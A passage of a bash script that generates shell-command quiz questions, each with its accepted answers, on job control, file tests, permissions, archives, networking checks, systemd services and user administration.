  questions+=("Wait for all jobs, then echo 'done'|wait && echo done|wait && echo 'done'|wait && echo \"done\"|wait; echo done|wait; echo 'done'|wait; echo \"done\"")
  questions+=("Kill job ${n2}, echo 'killed' on success|kill %${n2} && echo killed|kill %${n2} && echo 'killed'|kill %${n2} && echo \"killed\"")
  questions+=("Run ${W}${script}${C} in background, print its PID§./${script} & echo \$!§./${script} & echo \${!}§bash ${script} & echo \$!§sh ${script} & echo \$!")
  questions+=("Start ${Y}sleep 60${C} in background, show PID|sleep 60 & echo \$!|sleep 60 & echo \${!}")
  questions+=("Run ${W}${script}${C} in background and wait for it by PID§./${script} & pid=\$! && wait \$pid§./${script} & wait \$!§./${script} & pid=\$!; wait \$pid§./${script} & pid=\${!} && wait \$pid§./${script} & wait \${!}§./${script} & pid=\${!}; wait \$pid")
  questions+=("Start ${W}${script}${C} in background, save PID to file§./${script} & echo \$! > pid.txt§./${script} & echo \${!} > pid.txt")
  questions+=("Run ${W}${script}${C} in background, later grep output in ${W}${outfile}${C}§./${script} > ${outfile} & sleep 1 && grep ${term} ${outfile}")
  questions+=("Tail ${W}${log}${C} in background|tail -f ${log} &|tail --follow ${log} &|tail -F ${log} &")
  questions+=("Grep ${Y}${term}${C} from ${W}${log}${C} in background, save to ${W}matches.txt${C}|grep ${term} ${log} > matches.txt &|rg ${term} ${log} > matches.txt &")
  questions+=("Disown job ${n2} (detach from shell)|disown %${n2}|disown -h %${n2}")
  questions+=("Wait for job ${n2} specifically|wait %${n2}")
  questions+=("Bring most recent job to foreground|fg|fg %%|fg %+|fg %")
  questions+=("Continue stopped job in background|bg|bg %%|bg %+|bg %")
  questions+=("List all running processes|ps aux|ps -ef|ps -aux")
  questions+=("Find processes by name '${script}'§ps aux | grep ${script}§ps -ef | grep ${script}§pgrep -a ${script}§pgrep -fl ${script}")
  questions+=("Kill process with PID ${n}|kill ${n}|kill -TERM ${n}|kill -15 ${n}|kill -s TERM ${n}")
  questions+=("Force kill process with PID ${n}|kill -9 ${n}|kill -KILL ${n}|kill -s KILL ${n}|kill -s 9 ${n}")
  questions+=("Kill all processes named '${script}'|pkill ${script}|killall ${script}|pkill -f ${script}")
  questions+=("List PIDs of processes named '${script}'|pgrep ${script}|pgrep -f ${script}|pidof ${script}")
  questions+=("Run ${script} immune to hangups|nohup ./${script} &|nohup bash ${script} &|nohup ./${script} &>/dev/null &")
  questions+=("Detach current job from shell|disown|disown %%|disown %+")
  questions+=("Detach job ${n} from shell|disown %${n}")
}

# Level 12: Test Operators ([[ -f ]], [[ -d ]], etc)
gen_level12() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  _fpick SANDBOX_TXTS; txt=$REPLY; [[ "$REPLY" == "${SANDBOX_TXTS[0]}" ]] && txt2="${SANDBOX_TXTS[1]}" || txt2="${SANDBOX_TXTS[0]}"
  _fpick SANDBOX_CFGS; cfg=$REPLY; [[ "$REPLY" == "${SANDBOX_CFGS[0]}" ]] && cfg2="${SANDBOX_CFGS[1]}" || cfg2="${SANDBOX_CFGS[0]}"
  _fpick SANDBOX_LOGS; log=$REPLY; _fpick SANDBOX_SCRIPTS; script=$REPLY
  _fphrase src data logs backup; dir=$REPLY; _fphrase temp cache build output; dir2=$REPLY
  n=$((RANDOM % 90 + 10)); n2=$((RANDOM % 50 + 5)); n3=$((RANDOM % 5 + 3))
  _fphrase ERROR WARN INFO DEBUG; term=$REPLY
  questions+=("Test if ${W}${txt}${C} exists and is a file|[[ -f ${txt} ]]|test -f ${txt}|[ -f ${txt} ]")
  questions+=("Test if ${W}${dir}${C} exists and is a directory|[[ -d ${dir} ]]|test -d ${dir}|[ -d ${dir} ]")
  questions+=("Test if ${W}${txt}${C} is readable|[[ -r ${txt} ]]|test -r ${txt}|[ -r ${txt} ]")
  questions+=("Test if ${W}${script}${C} is executable|[[ -x ${script} ]]|test -x ${script}|[ -x ${script} ]")
  questions+=("Test if ${W}${txt}${C} is non-empty|[[ -s ${txt} ]]|test -s ${txt}|[ -s ${txt} ]")
  questions+=("Test if \$var is empty|[[ -z \"\$var\" ]]|[[ -z \$var ]]|[ -z \"\$var\" ]|test -z \"\$var\"")
  questions+=("Test if \$var is NOT empty|[[ -n \"\$var\" ]]|[[ -n \$var ]]|[[ \"\$var\" ]]|[[ \$var ]]|[ -n \"\$var\" ]|test -n \"\$var\"|[ \"\$var\" ]|test \"\$var\"")
  questions+=("Test if \$num is greater than ${n}|[[ \$num -gt ${n} ]]|[ \$num -gt ${n} ]|test \$num -gt ${n}|(( num > ${n} ))|(( \$num > ${n} ))")
  questions+=("If ${W}${txt}${C} is readable, display it|[[ -r ${txt} ]] && cat ${txt}|[ -r ${txt} ] && cat ${txt}|test -r ${txt} && cat ${txt}")
  questions+=("If ${W}${cfg}${C} exists and readable, show with line numbers|[[ -f ${cfg} && -r ${cfg} ]] && cat -n ${cfg}|[[ -f ${cfg} ]] && [[ -r ${cfg} ]] && cat -n ${cfg}|[ -f ${cfg} ] && [ -r ${cfg} ] && cat -n ${cfg}|test -f ${cfg} && test -r ${cfg} && cat -n ${cfg}|[[ -f ${cfg} && -r ${cfg} ]] && cat --number ${cfg}|[[ -f ${cfg} ]] && [[ -r ${cfg} ]] && cat --number ${cfg}|[ -f ${cfg} ] && [ -r ${cfg} ] && cat --number ${cfg}|test -f ${cfg} && test -r ${cfg} && cat --number ${cfg}|[[ -f ${cfg} && -r ${cfg} ]] && nl ${cfg}|[[ -f ${cfg} ]] && [[ -r ${cfg} ]] && nl ${cfg}|[ -f ${cfg} ] && [ -r ${cfg} ] && nl ${cfg}|test -f ${cfg} && test -r ${cfg} && nl ${cfg}")
  questions+=("If ${W}${log}${C} exists, show first ${n3} lines|[[ -f ${log} ]] && head -${n3} ${log}|[[ -f ${log} ]] && head -n ${n3} ${log}|[ -f ${log} ] && head -${n3} ${log}|[ -f ${log} ] && head -n ${n3} ${log}|test -f ${log} && head -${n3} ${log}|test -f ${log} && head -n ${n3} ${log}")
  questions+=("If ${W}${log}${C} has content, show last ${n3} lines|[[ -s ${log} ]] && tail -${n3} ${log}|[[ -s ${log} ]] && tail -n ${n3} ${log}|[ -s ${log} ] && tail -${n3} ${log}|[ -s ${log} ] && tail -n ${n3} ${log}|test -s ${log} && tail -${n3} ${log}|test -s ${log} && tail -n ${n3} ${log}")
  questions+=("If ${W}${log}${C} exists, search for ${Y}${term}${C}|[[ -f ${log} ]] && grep ${term} ${log}|[ -f ${log} ] && grep ${term} ${log}|test -f ${log} && grep ${term} ${log}|[[ -f ${log} ]] && rg ${term} ${log}|[ -f ${log} ] && rg ${term} ${log}|test -f ${log} && rg ${term} ${log}")
  questions+=("If ${W}${log}${C} is non-empty, count ${Y}${term}${C} matches|[[ -s ${log} ]] && grep -c ${term} ${log}|[[ -s ${log} ]] && grep --count ${term} ${log}|[ -s ${log} ] && grep -c ${term} ${log}|[ -s ${log} ] && grep --count ${term} ${log}|test -s ${log} && grep -c ${term} ${log}|test -s ${log} && grep --count ${term} ${log}|[[ -s ${log} ]] && rg -c ${term} ${log}|[ -s ${log} ] && rg -c ${term} ${log}|test -s ${log} && rg -c ${term} ${log}")
  questions+=("Test if ${W}${log}${C} contains ${Y}${term}${C}§[[ -f ${log} ]] && grep -q ${term} ${log}§[[ -f ${log} ]] && grep --quiet ${term} ${log}§[[ -f ${log} ]] && grep --silent ${term} ${log}§[ -f ${log} ] && grep -q ${term} ${log}§[ -f ${log} ] && grep --quiet ${term} ${log}§[ -f ${log} ] && grep --silent ${term} ${log}§test -f ${log} && grep -q ${term} ${log}§test -f ${log} && grep --quiet ${term} ${log}§test -f ${log} && grep --silent ${term} ${log}§rg -q ${term} ${log}§rg --quiet ${term} ${log}")
  questions+=("If ${W}${txt}${C} is writable, append timestamp|[[ -w ${txt} ]] && date >> ${txt}|[ -w ${txt} ] && date >> ${txt}|test -w ${txt} && date >> ${txt}")
  questions+=("If ${W}${script}${C} is executable, run and log output|[[ -x ${script} ]] && ./${script} > output.log 2>&1|[[ -x ${script} ]] && ./${script} &> output.log|[[ -x ${script} ]] && ./${script} >& output.log|[ -x ${script} ] && ./${script} > output.log 2>&1|[ -x ${script} ] && ./${script} &> output.log|[ -x ${script} ] && ./${script} >& output.log|test -x ${script} && ./${script} > output.log 2>&1|test -x ${script} && ./${script} &> output.log|test -x ${script} && ./${script} >& output.log")
  questions+=("Test if ${W}${dir}${C} exists, create if not§[[ -d ${dir} ]] || mkdir -p ${dir}§[ -d ${dir} ] || mkdir -p ${dir}§test -d ${dir} || mkdir -p ${dir}§[[ -d ${dir} ]] || mkdir --parents ${dir}§[ -d ${dir} ] || mkdir --parents ${dir}§test -d ${dir} || mkdir --parents ${dir}§[[ -d ${dir} ]] || mkdir ${dir}§[ -d ${dir} ] || mkdir ${dir}§test -d ${dir} || mkdir ${dir}")
  questions+=("If ${W}${txt}${C} exists cat it, else echo 'missing'§[[ -f ${txt} ]] && cat ${txt} || echo 'missing'§[ -f ${txt} ] && cat ${txt} || echo 'missing'§test -f ${txt} && cat ${txt} || echo 'missing'§[[ -f ${txt} ]] && cat ${txt} || echo \"missing\"§[ -f ${txt} ] && cat ${txt} || echo \"missing\"§test -f ${txt} && cat ${txt} || echo \"missing\"")
  questions+=("If ${W}${cfg}${C} is writable, backup it and echo done|[[ -w ${cfg} ]] && cp ${cfg} ${cfg}.bak && echo done|[ -w ${cfg} ] && cp ${cfg} ${cfg}.bak && echo done|test -w ${cfg} && cp ${cfg} ${cfg}.bak && echo done|[[ -w ${cfg} ]] && cp ${cfg} ${cfg}.bak && echo 'done'|[ -w ${cfg} ] && cp ${cfg} ${cfg}.bak && echo 'done'|test -w ${cfg} && cp ${cfg} ${cfg}.bak && echo 'done'")
  questions+=("Check ${W}${txt}${C} exists or exit with error§[[ -f ${txt} ]] || { echo 'not found' >&2; exit 1; }§[ -f ${txt} ] || { echo 'not found' >&2; exit 1; }§test -f ${txt} || { echo 'not found' >&2; exit 1; }§[[ -f ${txt} ]] || { echo \"not found\" >&2; exit 1; }§[ -f ${txt} ] || { echo \"not found\" >&2; exit 1; }§test -f ${txt} || { echo \"not found\" >&2; exit 1; }")
  questions+=("If ${W}${txt}${C} line count (in ${Y}\$lines${C}) > ${n2}, show first ${n3} lines§lines=\$(wc -l < ${txt}); [[ \$lines -gt ${n2} ]] && head -${n3} ${txt}§lines=\$(wc -l < ${txt}); [[ \$lines -gt ${n2} ]] && head -n ${n3} ${txt}§lines=\$(wc -l < ${txt}); (( lines > ${n2} )) && head -${n3} ${txt}§lines=\$(wc -l < ${txt}); (( lines > ${n2} )) && head -n ${n3} ${txt}§lines=\$(wc -l < ${txt}); [ \$lines -gt ${n2} ] && head -${n3} ${txt}§lines=\$(wc -l < ${txt}); [ \$lines -gt ${n2} ] && head -n ${n3} ${txt}§lines=\$(wc -l < ${txt}); test \$lines -gt ${n2} && head -${n3} ${txt}§lines=\$(wc -l < ${txt}); test \$lines -gt ${n2} && head -n ${n3} ${txt}")
  questions+=("Test if ${W}${txt}${C} has more than ${n2} words§[[ \$(wc -w < ${txt}) -gt ${n2} ]]§[[ \$(wc --words < ${txt}) -gt ${n2} ]]§(( \$(wc -w < ${txt}) > ${n2} ))§(( \$(wc --words < ${txt}) > ${n2} ))§[ \$(wc -w < ${txt}) -gt ${n2} ]§[ \$(wc --words < ${txt}) -gt ${n2} ]§test \$(wc -w < ${txt}) -gt ${n2}§test \$(wc --words < ${txt}) -gt ${n2}")
  questions+=("Test if ${W}${txt}${C} exists AND is readable|[[ -f ${txt} && -r ${txt} ]]|[[ -f ${txt} ]] && [[ -r ${txt} ]]|[ -f ${txt} ] && [ -r ${txt} ]|test -f ${txt} && test -r ${txt}")
  questions+=("Test if ${W}${txt}${C} OR ${W}${cfg}${C} exists§[[ -f ${txt} || -f ${cfg} ]]§[[ -f ${txt} ]] || [[ -f ${cfg} ]]§[ -f ${txt} ] || [ -f ${cfg} ]§test -f ${txt} || test -f ${cfg}")
  questions+=("Test if ${W}${txt}${C} does NOT exist|[[ ! -f ${txt} ]]|test ! -f ${txt}|[ ! -f ${txt} ]|! [[ -f ${txt} ]]|! [ -f ${txt} ]|! test -f ${txt}")
  questions+=("Test if ${W}${txt}${C} is newer than ${W}${cfg}${C}|[[ ${txt} -nt ${cfg} ]]|[ ${txt} -nt ${cfg} ]|test ${txt} -nt ${cfg}")
}

# Level 13: Core File Tools
gen_level13() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  local perm1=$((RANDOM % 7 + 1))$((RANDOM % 8))$((RANDOM % 8))
  _fphrase ERROR WARN INFO DEBUG; local searchterm=$REPLY
  [[ "$cfg2" == "$cfg" ]] && { _fpick CONFIGS; cfg2=$REPLY; }
  [[ "$txt2" == "$txt" ]] && { _fpick TXTS; txt2=$REPLY; }
  questions+=("Concatenate ${txt} and ${txt2} together|cat ${txt} ${txt2}|cat -- ${txt} ${txt2}")
  questions+=("List sorted by size, largest first|ls -lS|ls -Sl|ls -lhS|ls -lSh|ls -Slh|ls -Shl|ls -hlS|ls -hSl|eza -l --sort size -r|eza --long --sort size --reverse|eza -l --sort size --reverse|eza --long --sort size -r")
  questions+=("List sorted by time, newest first|ls -lt|ls -tl|ls -lth|ls -tlh|ls -hlt|ls -htl|ls -thl|ls -lht|eza -l --sort modified -r|eza --long --sort modified --reverse|eza -l --sort modified --reverse|eza --long --sort modified -r")
  questions+=("List only directories|ls -d */|ls --directory */|eza -D|eza --only-dirs")
  questions+=("Show directory tree|tree|eza -T|eza --tree")
  questions+=("Tree ${n3} levels deep|tree -L ${n3}|eza -T -L ${n3}|eza --tree -L ${n3}|eza -T --level ${n3}|eza --tree --level ${n3}")
  questions+=("Long listing with human sizes|ls -lh|ls -hl|ls -l --human-readable|eza -lh|eza --long -h|eza --long --human-readable|eza -l --human-readable")
  questions+=("List one file per line|ls -1|eza -1|eza --oneline")
  questions+=("List ${dir}/ recursively|ls -R ${dir}/|ls --recursive ${dir}/|ls -R ${dir}|ls --recursive ${dir}|eza -R ${dir}/|eza --recurse ${dir}/|eza -R ${dir}|eza --recurse ${dir}")
  questions+=("Count lines in ${csv}|wc -l ${csv}|wc -l < ${csv}|wc --lines ${csv}|wc --lines < ${csv}")
  questions+=("Count words in ${txt}|wc -w ${txt}|wc --words ${txt}|wc -w < ${txt}|wc --words < ${txt}")
  questions+=("Count bytes in ${txt}|wc -c ${txt}|wc --bytes ${txt}|wc -c < ${txt}|wc --bytes < ${txt}")
  questions+=("Disk usage of current dir, human readable|du -sh .|du -hs .|du -s -h .|du -h -s .|du --summarize --human-readable .|du --human-readable --summarize .|dust|du -sh|du --summarize --human-readable|du --human-readable --summarize")
  questions+=("Disk usage of each subdir|du -sh */|du -hs */|du -h --max-depth=1|du -hd 1|du -h -d 1|du --human-readable --max-depth=1|du -h --max-depth 1|du --human-readable --max-depth 1|dust -d 1")
  # shellcheck disable=SC2034  # used via _fpick nameref
  local -a GZ_ARCHIVES=(backup.tar.gz archive.tar.gz files.tgz release.tar.gz package.tar.gz source.tar.gz logs.tar.gz)
  _fpick GZ_ARCHIVES; local gz_archive=$REPLY
  questions+=("Extract ${gz_archive}|tar xzf ${gz_archive}|tar -xzf ${gz_archive}|tar xf ${gz_archive}|tar -xf ${gz_archive}|tar xvzf ${gz_archive}|tar -xvzf ${gz_archive}|tar xvf ${gz_archive}|tar -xvf ${gz_archive}")
  questions+=("Extract ${gz_archive} to ${dir}/|tar xzf ${gz_archive} -C ${dir}/|tar -xzf ${gz_archive} -C ${dir}/|tar xf ${gz_archive} -C ${dir}/|tar -xf ${gz_archive} -C ${dir}/|tar xzf ${gz_archive} -C ${dir}|tar -xzf ${gz_archive} -C ${dir}|tar xf ${gz_archive} -C ${dir}|tar -xf ${gz_archive} -C ${dir}|tar xzf ${gz_archive} --directory ${dir}/|tar xzf ${gz_archive} --directory ${dir}|tar xf ${gz_archive} --directory ${dir}/|tar xf ${gz_archive} --directory ${dir}|tar xvzf ${gz_archive} -C ${dir}/|tar -xvzf ${gz_archive} -C ${dir}/|tar xvzf ${gz_archive} -C ${dir}|tar -xvzf ${gz_archive} -C ${dir}")
  questions+=("Create ${W}archive.tar.gz${C} from ${dir}/|tar czf archive.tar.gz ${dir}/|tar -czf archive.tar.gz ${dir}/|tar czf archive.tar.gz ${dir}|tar -czf archive.tar.gz ${dir}|tar cvzf archive.tar.gz ${dir}/|tar -cvzf archive.tar.gz ${dir}/|tar cvzf archive.tar.gz ${dir}|tar -cvzf archive.tar.gz ${dir}")
  questions+=("List contents of ${gz_archive} without extracting|tar tzf ${gz_archive}|tar -tzf ${gz_archive}|tar tf ${gz_archive}|tar -tf ${gz_archive}|tar tvzf ${gz_archive}|tar -tvzf ${gz_archive}|tar tvf ${gz_archive}|tar -tvf ${gz_archive}")
  questions+=("Create symlink 'link' pointing to ${cfg}|ln -s ${cfg} link|ln --symbolic ${cfg} link")
  questions+=("Create symlink 'link' to ${cfg} using absolute path|ln -s \$(pwd)/${cfg} link|ln --symbolic \$(pwd)/${cfg} link|ln -s \$PWD/${cfg} link|ln --symbolic \$PWD/${cfg} link")
  _fphrase "Show" "Display" "Print"; questions+=("${REPLY} where symlink points|readlink link|ls -l link")
  questions+=("Remove symlink (not target)|rm link|unlink link")
  questions+=("Create hard link 'hardlink' pointing to ${txt}|ln ${txt} hardlink|ln -- ${txt} hardlink")
  questions+=("Follow symlink to find real path|readlink -f link|readlink --canonicalize link|realpath link|readlink -e link|readlink --canonicalize-existing link")
  questions+=("Make ${script} executable|chmod +x ${script}|chmod u+x ${script}|chmod a+x ${script}")
  questions+=("Set ${script} to rwxr-xr-x (755)|chmod 755 ${script}|chmod u=rwx,go=rx ${script}")
  questions+=("Set ${cfg} to rw-r--r-- (644)|chmod 644 ${cfg}|chmod u=rw,go=r ${cfg}")
  questions+=("Set ${txt} permissions to ${perm1}|chmod ${perm1} ${txt}")
  questions+=("Add write permission for group in ${W}${cfg}${C}|chmod g+w ${cfg}")
  questions+=("Remove all permissions for others in ${W}${cfg}${C}|chmod o-rwx ${cfg}|chmod o= ${cfg}|chmod o-xwr ${cfg}|chmod o-wrx ${cfg}|chmod o-rxw ${cfg}|chmod o-xrw ${cfg}|chmod o-wxr ${cfg}")
  questions+=("Make ${dir}/ and contents readable by all|chmod -R a+r ${dir}/|chmod --recursive a+r ${dir}/|chmod -R a+r ${dir}|chmod --recursive a+r ${dir}|sudo chmod -R a+r ${dir}/|sudo chmod --recursive a+r ${dir}/|sudo chmod -R a+r ${dir}|sudo chmod --recursive a+r ${dir}")
  questions+=("Remove write permission for everyone in ${W}${txt}${C}|chmod a-w ${txt}|chmod -w ${txt}")
  questions+=("Set exact read-only (r--r--r--) in ${W}${txt}${C}|chmod 444 ${txt}|chmod a=r ${txt}|chmod ugo=r ${txt}")
  questions+=("Copy permissions from ${cfg} to ${txt}|chmod --reference=${cfg} ${txt}|chmod --reference ${cfg} ${txt}")
  questions+=("If ${W}${log}${C} exists, show lines with ${Y}${searchterm}${C}§[[ -f ${log} ]] && grep ${searchterm} ${log}§[ -f ${log} ] && grep ${searchterm} ${log}§test -f ${log} && grep ${searchterm} ${log}")
  questions+=("Copy ${W}${cfg}${C} to backup and verify§cp ${cfg} ${cfg}.bak && diff ${cfg} ${cfg}.bak§cp ${cfg} ${cfg}.bak && diff ${cfg}.bak ${cfg}")
  questions+=("Create ${W}${dir}${C}, then list its contents|mkdir -p ${dir} && ls -la ${dir}|mkdir -p ${dir} && ls -l ${dir}|mkdir -p ${dir} && ls ${dir}|mkdir --parents ${dir} && ls -la ${dir}|mkdir --parents ${dir} && ls -l ${dir}|mkdir --parents ${dir} && ls ${dir}|mkdir ${dir} && ls -la ${dir}|mkdir ${dir} && ls -l ${dir}|mkdir ${dir} && ls ${dir}")
  questions+=("Count ${Y}${searchterm}${C} in ${W}${log}${C} if exists§[[ -f ${log} ]] && grep -c ${searchterm} ${log}§[ -f ${log} ] && grep -c ${searchterm} ${log}§test -f ${log} && grep -c ${searchterm} ${log}§[[ -f ${log} ]] && grep --count ${searchterm} ${log}§[ -f ${log} ] && grep --count ${searchterm} ${log}§test -f ${log} && grep --count ${searchterm} ${log}")
  questions+=("Extract ${W}${gz_archive}${C} and list contents§tar xzf ${gz_archive} && ls -la§tar -xzf ${gz_archive} && ls -la§tar xf ${gz_archive} && ls -la§tar -xf ${gz_archive} && ls -la§tar xzf ${gz_archive} && ls§tar -xzf ${gz_archive} && ls§tar xf ${gz_archive} && ls§tar -xf ${gz_archive} && ls§tar xzf ${gz_archive} && ls -l§tar -xzf ${gz_archive} && ls -l§tar xf ${gz_archive} && ls -l§tar -xf ${gz_archive} && ls -l§tar xvzf ${gz_archive}§tar -xvzf ${gz_archive}")
  questions+=("Copy ${W}${txt}${C} to ${W}${dir}${C}/ and echo done|cp ${txt} ${dir}/ && echo done|cp ${txt} ${dir} && echo done|cp ${txt} ${dir}/ && echo 'done'|cp ${txt} ${dir} && echo 'done'")
  _fphrase alice bob deploy www-data; local owner=$REPLY
  _fphrase staff www-data developers users; local group=$REPLY
  questions+=("Change owner of ${W}${txt}${C} to ${owner}|sudo chown ${owner} ${txt}|chown ${owner} ${txt}")
  questions+=("Change owner and group of ${W}${cfg}${C} to ${owner}:${group}|sudo chown ${owner}:${group} ${cfg}|chown ${owner}:${group} ${cfg}|sudo chown ${owner}.${group} ${cfg}|chown ${owner}.${group} ${cfg}")
  questions+=("Change group of ${W}${txt}${C} to ${group}|sudo chgrp ${group} ${txt}|chgrp ${group} ${txt}|sudo chown :${group} ${txt}|chown :${group} ${txt}")
  questions+=("Recursively change owner of ${W}${dir}${C}/ to ${owner}|sudo chown -R ${owner} ${dir}/|chown -R ${owner} ${dir}/|sudo chown -R ${owner} ${dir}|chown -R ${owner} ${dir}|sudo chown --recursive ${owner} ${dir}/|chown --recursive ${owner} ${dir}/|sudo chown --recursive ${owner} ${dir}|chown --recursive ${owner} ${dir}")
  questions+=("Identify file type of ${W}${txt}${C}|file ${txt}|file -- ${txt}")
  questions+=("Identify file type of ${W}${script}${C}|file ${script}|file -- ${script}")
  questions+=("Show detailed metadata of ${W}${txt}${C}|stat ${txt}")
  questions+=("Show only the size of ${W}${txt}${C} in bytes|stat -c %s ${txt}|stat --format=%s ${txt}|stat --printf='%s' ${txt}|stat -c '%s' ${txt}|stat --format '%s' ${txt}")
  questions+=("Show current umask|umask")
  questions+=("Set umask to 022 (files: 644, dirs: 755)|umask 022|umask 0022")
}

# Level 14: System Admin
gen_level14() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  _fphrase git vim tmux htop curl wget rsync jq; local pkg=$REPLY
  questions+=("Ping ${ip} 5 times|ping -c 5 ${ip}|ping -c5 ${ip}|ping --count 5 ${ip}|ping --count=5 ${ip}")
  questions+=("Ping ${ip} continuously|ping ${ip}")
  questions+=("Trace the network path to ${ip}|traceroute ${ip}|tracepath ${ip}|mtr ${ip}|mtr -r ${ip}|mtr --report ${ip}")
  questions+=("DNS lookup for ${host}|dig ${host}|nslookup ${host}|host ${host}|drill ${host}")
  questions+=("Reverse DNS lookup for ${ip}|dig -x ${ip}|host ${ip}|nslookup ${ip}|drill -x ${ip}")
  questions+=("Check if port ${port} is open on ${ip}|nc -zv ${ip} ${port}|nc -z ${ip} ${port}|ncat -zv ${ip} ${port}|ncat -z ${ip} ${port}|bash -c 'echo >/dev/tcp/${ip}/${port}'|echo >/dev/tcp/${ip}/${port}")
  questions+=("Show listening ports|ss -tlnp|ss -ltnp|ss -nltp|ss -tulnp|netstat -tlnp|netstat -ltnp|netstat -tulnp|sudo ss -tlnp|sudo ss -tulnp|sudo netstat -tlnp|sudo netstat -tulnp|ss -tln|ss -ltn|ss -nlt")
  questions+=("Show all network connections|ss -tunapl|netstat -tunapl|sudo ss -tunapl|sudo netstat -tunapl")
  questions+=("Show routing table|ip route|ip r|ip route show|ip r show|route|netstat -r|netstat -rn")
  questions+=("Show network interfaces|ip addr|ip a|ip addr show|ip a show|ip address|ip address show|ifconfig|ifconfig -a|ip link|ip link show")
  questions+=("Show disk space usage (human-readable)|df -h|df --human-readable")
  questions+=("Show memory usage (human-readable)|free -h|free --human")
  questions+=("Show system uptime|uptime|uptime -p|uptime --pretty")
  questions+=("Show system info|uname -a|uname --all|hostnamectl")
  questions+=("Show CPU info|lscpu|cat /proc/cpuinfo")
  questions+=("Show kernel messages|dmesg|dmesg -T|journalctl -k|journalctl --dmesg|sudo dmesg|sudo dmesg -T|sudo journalctl -k|sudo journalctl --dmesg")
  questions+=("Interactive process viewer|top|htop|btop")
  questions+=("Show top 10 memory-hungry processes§ps aux --sort=-%mem | head -11§ps aux --sort=-%mem | head -n 11§ps aux --sort=-%mem | head --lines=11§ps aux --sort=-%mem | head --lines 11§ps aux --sort -%mem | head -11§ps aux --sort -%mem | head -n 11")
  questions+=("Show process tree|pstree|ps auxf|ps faux|ps -ef --forest|pstree -p|ps axf|ps fax")
  questions+=("Check status of ${svc}|systemctl status ${svc}|sudo systemctl status ${svc}|systemctl status ${svc}.service|sudo systemctl status ${svc}.service")
  questions+=("Start ${svc}|systemctl start ${svc}|sudo systemctl start ${svc}|systemctl start ${svc}.service|sudo systemctl start ${svc}.service")
  questions+=("Stop ${svc}|systemctl stop ${svc}|sudo systemctl stop ${svc}|systemctl stop ${svc}.service|sudo systemctl stop ${svc}.service")
  questions+=("Restart ${svc}|systemctl restart ${svc}|sudo systemctl restart ${svc}|systemctl restart ${svc}.service|sudo systemctl restart ${svc}.service")
  questions+=("Enable ${svc} at boot|systemctl enable ${svc}|sudo systemctl enable ${svc}|systemctl enable ${svc}.service|sudo systemctl enable ${svc}.service")
  questions+=("Disable ${svc} at boot|systemctl disable ${svc}|sudo systemctl disable ${svc}|systemctl disable ${svc}.service|sudo systemctl disable ${svc}.service")
  questions+=("List running services|systemctl list-units --type=service --state=running|systemctl list-units --type service --state running")
  questions+=("Show services that failed to start|systemctl --failed|systemctl list-units --state=failed|systemctl list-units --state failed|systemctl list-units --failed")
  questions+=("Reload systemd daemon|systemctl daemon-reload|sudo systemctl daemon-reload")
  questions+=("Show ${svc} logs|journalctl -u ${svc}|journalctl --unit ${svc}|journalctl --unit=${svc}|sudo journalctl -u ${svc}|sudo journalctl --unit ${svc}|sudo journalctl --unit=${svc}|journalctl -u ${svc}.service|journalctl --unit ${svc}.service|journalctl --unit=${svc}.service|sudo journalctl -u ${svc}.service|sudo journalctl --unit ${svc}.service|sudo journalctl --unit=${svc}.service")
  questions+=("Follow ${svc} logs|journalctl -fu ${svc}|journalctl --follow -u ${svc}|journalctl --follow --unit ${svc}|journalctl --follow --unit=${svc}|journalctl -f --unit ${svc}|journalctl -f --unit=${svc}|sudo journalctl -fu ${svc}|sudo journalctl --follow -u ${svc}|journalctl -fu ${svc}.service|journalctl --follow -u ${svc}.service|journalctl --follow --unit ${svc}.service|journalctl --follow --unit=${svc}.service|journalctl -f --unit ${svc}.service|journalctl -f --unit=${svc}.service|sudo journalctl -fu ${svc}.service|sudo journalctl --follow -u ${svc}.service")
  questions+=("Show logs since boot|journalctl -b|journalctl --boot|journalctl -b 0|journalctl --boot 0|journalctl --boot=0")
  questions+=("Show last 100 log lines|journalctl -n 100|journalctl --lines 100|journalctl --lines=100")
  questions+=("Run ${script} as root|sudo ./${script}|sudo bash ${script}|sudo sh ${script}")
  questions+=("Switch to root shell|sudo -i|su -|sudo su|sudo -s|sudo bash|sudo su -|su -l|su --login")
  questions+=("Switch to user ${user}|su - ${user}|sudo su - ${user}|sudo -iu ${user}|su -l ${user}|su --login ${user}")
  questions+=("Add user ${user}|useradd -m ${user}|sudo useradd -m ${user}|useradd --create-home ${user}|sudo useradd --create-home ${user}|adduser ${user}|sudo adduser ${user}")
  questions+=("Delete user ${user}|userdel -r ${user}|sudo userdel -r ${user}|userdel --remove ${user}|sudo userdel --remove ${user}")
  questions+=("Change password for ${user}|passwd ${user}|sudo passwd ${user}")
  questions+=("Add ${user} to group wheel|usermod -aG wheel ${user}|sudo usermod -aG wheel ${user}|gpasswd -a ${user} wheel|sudo gpasswd -a ${user} wheel|usermod --append --groups wheel ${user}|sudo usermod --append --groups wheel ${user}|usermod -a -G wheel ${user}|sudo usermod -a -G wheel ${user}")
  questions+=("List groups for ${user}|groups ${user}|id ${user}|id -Gn ${user}|id --groups --name ${user}")
  questions+=("Change owner of ${txt} to ${user}|chown ${user} ${txt}|sudo chown ${user} ${txt}")
  questions+=("Change owner and group of ${txt} to ${user}|chown ${user}:${user} ${txt}|sudo chown ${user}:${user} ${txt}")
  questions+=("Change owner of ${dir}/ recursively to ${user}|chown -R ${user}:${user} ${dir}/|sudo chown -R ${user}:${user} ${dir}/|chown --recursive ${user}:${user} ${dir}/|sudo chown --recursive ${user}:${user} ${dir}/|chown -R ${user} ${dir}/|sudo chown -R ${user} ${dir}/|chown --recursive ${user} ${dir}/|sudo chown --recursive ${user} ${dir}/|chown -R ${user}:${user} ${dir}|sudo chown -R ${user}:${user} ${dir}|chown --recursive ${user}:${user} ${dir}|sudo chown --recursive ${user}:${user} ${dir}|chown -R ${user} ${dir}|sudo chown -R ${user} ${dir}|chown --recursive ${user} ${dir}|sudo chown --recursive ${user} ${dir}")
  questions+=("Show current user|whoami|id -un")
  questions+=("Show user id info|id")
